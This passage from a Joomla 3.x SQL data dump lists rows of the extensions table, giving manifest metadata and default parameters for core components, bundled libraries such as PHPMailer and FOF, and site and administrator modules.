reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_TEMPLATES_XML_DESCRIPTION\",\"group\":\"\"}','{\"template_positions_display\":\"0\",\"upload_limit\":\"2\",\"image_formats\":\"gif,bmp,jpg,jpeg,png\",\"source_formats\":\"txt,less,ini,xml,js,php,css\",\"font_formats\":\"woff,ttf,otf\",\"compressed_formats\":\"zip\"}','','',0,'0000-00-00 00:00:00',0,0),(21,'com_weblinks','component','com_weblinks','',1,1,1,0,'{\"name\":\"com_weblinks\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_comp_description\":\"1\",\"comp_description\":\"\",\"show_link_hits\":\"1\",\"show_link_description\":\"1\",\"show_other_cats\":\"0\",\"show_headings\":\"0\",\"show_numbers\":\"0\",\"show_report\":\"1\",\"count_clicks\":\"1\",\"target\":\"0\",\"link_icons\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(22,'com_content','component','com_content','',1,1,0,1,'{\"name\":\"com_content\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{\"article_layout\":\"_:default\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"1\",\"link_author\":\"0\",\"show_create_date\":\"1\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_readmore\":\"1\",\"show_readmore_title\":\"0\",\"readmore_limit\":\"100\",\"show_icons\":\"1\",\"show_print_icon\":\"1\",\"show_email_icon\":\"1\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"0\",\"show_publishing_options\":\"1\",\"show_article_options\":\"1\",\"show_urls_images_frontend\":\"1\",\"show_urls_images_backend\":\"1\",\"targeta\":0,\"targetb\":0,\"targetc\":0,\"float_intro\":\"right\",\"float_fulltext\":\"right\",\"category_layout\":\"_:blog\",\"show_category_heading_title_text\":\"1\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"1\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"1\",\"show_cat_num_articles\":\"0\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"1\",\"orderby_pri\":\"order\",\"orderby_sec\":\"rdate\",\"order_date\":\"published\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\",\"feed_show_readmore\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(23,'com_config','component','com_config','',1,1,0,1,'{\"name\":\"com_config\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONFIG_XML_DESCRIPTION\",\"group\":\"\"}','{\"filters\":{\"1\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"9\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}','','',0,'0000-00-00 00:00:00',0,0),(24,'com_redirect','component','com_redirect','',1,1,0,1,'{\"name\":\"com_redirect\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(25,'com_users','component','com_users','',1,1,0,1,'{\"name\":\"com_users\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_USERS_XML_DESCRIPTION\",\"group\":\"\"}','{\"allowUserRegistration\":\"1\",\"new_usertype\":\"2\",\"guest_usergroup\":\"1\",\"useractivation\":\"1\",\"mail_to_admin\":\"0\",\"captcha\":\"\",\"frontend_userparams\":\"1\",\"site_language\":\"0\",\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(27,'com_finder','component','com_finder','',1,1,0,0,'','{\"show_description\":\"1\",\"description_length\":255,\"allow_empty_query\":\"0\",\"show_url\":\"1\",\"show_autosuggest\":\"1\",\"show_advanced\":\"1\",\"expand_advanced\":\"0\",\"show_date_filters\":\"0\",\"sort_order\":\"relevance\",\"sort_direction\":\"desc\",\"highlight_terms\":\"1\",\"opensearch_name\":\"\",\"opensearch_description\":\"\",\"batch_size\":\"50\",\"memory_table_limit\":30000,\"title_multiplier\":\"1.7\",\"text_multiplier\":\"0.7\",\"meta_multiplier\":\"1.2\",\"path_multiplier\":\"2.0\",\"misc_multiplier\":\"0.3\",\"stem\":\"1\",\"stemmer\":\"porter_en\"}','','',0,'0000-00-00 00:00:00',0,0),(29,'com_tags','component','com_tags','',1,1,1,1,'{\"name\":\"com_tags\",\"type\":\"component\",\"creationDate\":\"December 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"COM_TAGS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(30,'com_contenthistory','component','com_contenthistory','',1,1,1,0,'{\"name\":\"com_contenthistory\",\"type\":\"component\",\"creationDate\":\"May 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_CONTENTHISTORY_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(31,'com_ajax','component','com_ajax','',1,1,1,0,'{\"name\":\"com_ajax\",\"type\":\"component\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_AJAX_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(32,'com_postinstall','component','com_postinstall','',1,1,1,1,'{\"name\":\"com_postinstall\",\"type\":\"component\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_POSTINSTALL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(100,'PHPMailer','library','phpmailer','',0,1,1,1,'{\"name\":\"PHPMailer\",\"type\":\"library\",\"creationDate\":\"2001\",\"author\":\"PHPMailer\",\"copyright\":\"(c) 2001-2003, Brent R. Matzelle, (c) 2004-2009, Andy Prevost. All Rights Reserved., (c) 2010-2013, Jim Jagielski. All Rights Reserved.\",\"authorEmail\":\"jimjag@gmail.com\",\"authorUrl\":\"https:\\/\\/github.com\\/PHPMailer\\/PHPMailer\",\"version\":\"5.2.6\",\"description\":\"LIB_PHPMAILER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(101,'SimplePie','library','simplepie','',0,1,1,1,'{\"name\":\"SimplePie\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"SimplePie\",\"copyright\":\"Copyright (c) 2004-2009, Ryan Parman and Geoffrey Sneddon\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/simplepie.org\\/\",\"version\":\"1.2\",\"description\":\"LIB_SIMPLEPIE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(102,'phputf8','library','phputf8','',0,1,1,1,'{\"name\":\"phputf8\",\"type\":\"library\",\"creationDate\":\"2006\",\"author\":\"Harry Fuecks\",\"copyright\":\"Copyright various authors\",\"authorEmail\":\"hfuecks@gmail.com\",\"authorUrl\":\"http:\\/\\/sourceforge.net\\/projects\\/phputf8\",\"version\":\"0.5\",\"description\":\"LIB_PHPUTF8_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(103,'Joomla! Platform','library','joomla','',0,1,1,0,'{\"name\":\"Joomla! Platform\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"http:\\/\\/www.joomla.org\",\"version\":\"13.1\",\"description\":\"LIB_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{\"mediaversion\":\"4af6213096b8e4096584e6ab6477664d\"}','','',0,'0000-00-00 00:00:00',0,0),(104,'IDNA Convert','library','idna_convert','',0,1,1,1,'{\"name\":\"IDNA Convert\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"phlyLabs\",\"copyright\":\"2004-2011 phlyLabs Berlin, http:\\/\\/phlylabs.de\",\"authorEmail\":\"phlymail@phlylabs.de\",\"authorUrl\":\"http:\\/\\/phlylabs.de\",\"version\":\"0.8.0\",\"description\":\"LIB_IDNA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(105,'FOF','library','fof','',0,1,1,1,'{\"name\":\"FOF\",\"type\":\"library\",\"creationDate\":\"2014-03-09 12:54:48\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2014 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.2.1\",\"description\":\"LIB_FOF_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(106,'PHPass','library','phpass','',0,1,1,1,'{\"name\":\"PHPass\",\"type\":\"library\",\"creationDate\":\"2004-2006\",\"author\":\"Solar Designer\",\"copyright\":\"\",\"authorEmail\":\"solar@openwall.com\",\"authorUrl\":\"http:\\/\\/www.openwall.com\\/phpass\\/\",\"version\":\"0.3\",\"description\":\"LIB_PHPASS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(200,'mod_articles_archive','module','mod_articles_archive','',0,1,1,0,'{\"name\":\"mod_articles_archive\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters.\\n\\t\\tAll rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(201,'mod_articles_latest','module','mod_articles_latest','',0,1,1,0,'{\"name\":\"mod_articles_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_NEWS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(202,'mod_articles_popular','module','mod_articles_popular','',0,1,1,0,'{\"name\":\"mod_articles_popular\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(203,'mod_banners','module','mod_banners','',0,1,1,0,'{\"name\":\"mod_banners\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BANNERS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(204,'mod_breadcrumbs','module','mod_breadcrumbs','',0,1,1,1,'{\"name\":\"mod_breadcrumbs\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BREADCRUMBS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(205,'mod_custom','module','mod_custom','',0,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(206,'mod_feed','module','mod_feed','',0,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(207,'mod_footer','module','mod_footer','',0,1,1,0,'{\"name\":\"mod_footer\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FOOTER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(208,'mod_login','module','mod_login','',0,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(209,'mod_menu','module','mod_menu','',0,1,1,1,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(210,'mod_articles_news','module','mod_articles_news','',0,1,1,0,'{\"name\":\"mod_articles_news\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_NEWS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(211,'mod_random_image','module','mod_random_image','',0,1,1,0,'{\"name\":\"mod_random_image\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RANDOM_IMAGE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(212,'mod_related_items','module','mod_related_items','',0,1,1,0,'{\"name\":\"mod_related_items\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RELATED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(213,'mod_search','module','mod_search','',0,1,1,0,'{\"name\":\"mod_search\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SEARCH_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(214,'mod_stats','module','mod_stats','',0,1,1,0,'{\"name\":\"mod_stats\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(215,'mod_syndicate','module','mod_syndicate','',0,1,1,1,'{\"name\":\"mod_syndicate\",\"type\":\"module\",\"creationDate\":\"May 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SYNDICATE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(216,'mod_users_latest','module','mod_users_latest','',0,1,1,0,'{\"name\":\"mod_users_latest\",\"type\":\"module\",\"creationDate\":\"December 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_USERS_LATEST_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(217,'mod_weblinks','module','mod_weblinks','',0,1,1,0,'{\"name\":\"mod_weblinks\",\"type\":\"module\",\"creationDate\":\"July 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(218,'mod_whosonline','module','mod_whosonline','',0,1,1,0,'{\"name\":\"mod_whosonline\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WHOSONLINE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(219,'mod_wrapper','module','mod_wrapper','',0,1,1,0,'{\"name\":\"mod_wrapper\",\"type\":\"module\",\"creationDate\":\"October 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WRAPPER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(220,'mod_articles_category','module','mod_articles_category','',0,1,1,0,'{\"name\":\"mod_articles_category\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORY_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(221,'mod_articles_categories','module','mod_articles_categories','',0,1,1,0,'{\"name\":\"mod_articles_categories\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(222,'mod_languages','module','mod_languages','',0,1,1,1,'{\"name\":\"mod_languages\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(223,'mod_finder','module','mod_finder','',0,1,0,0,'','','','',0,'0000-00-00 00:00:00',0,0),(300,'mod_custom','module','mod_custom','',1,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(301,'mod_feed','module','mod_feed','',1,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(302,'mod_latest','module','mod_latest','',1,1,1,0,'{\"name\":\"mod_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(303,'mod_logged','module','mod_logged','',1,1,1,0,'{\"name\":\"mod_logged\",\"type\":\"module\",\"creationDate\":\"January 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGGED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(304,'mod_login','module','mod_login','',1,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"March 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(305,'mod_menu','module','mod_menu','',1,1,1,0,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(306,'mod_online','module','mod_online','',1,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(307,'mod_popular','module','mod_popular','',1,1,1,0,'{\"name\":\"mod_popular\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(308,'mod_quickicon','module','mod_quickicon','',1,1,1,1,'{\"name\":\"mod_quickicon\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_QUICKICON_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(309,'mod_status','module','mod_status','',1,1,1,0,'{\"name\":\"mod_status\",\"type\":\"module\",\"creationDate\":\"Feb 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATUS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(310,'mod_submenu','module','mod_submenu','',1,1,1,0,'{\"name\":\"mod_submenu\",\"type\":\"module\",\"creationDate\":\"Feb 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SUBMENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(311,'mod_title','module','mod_title','',1,1,1,0,'{\"name\":\"mod_title\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights 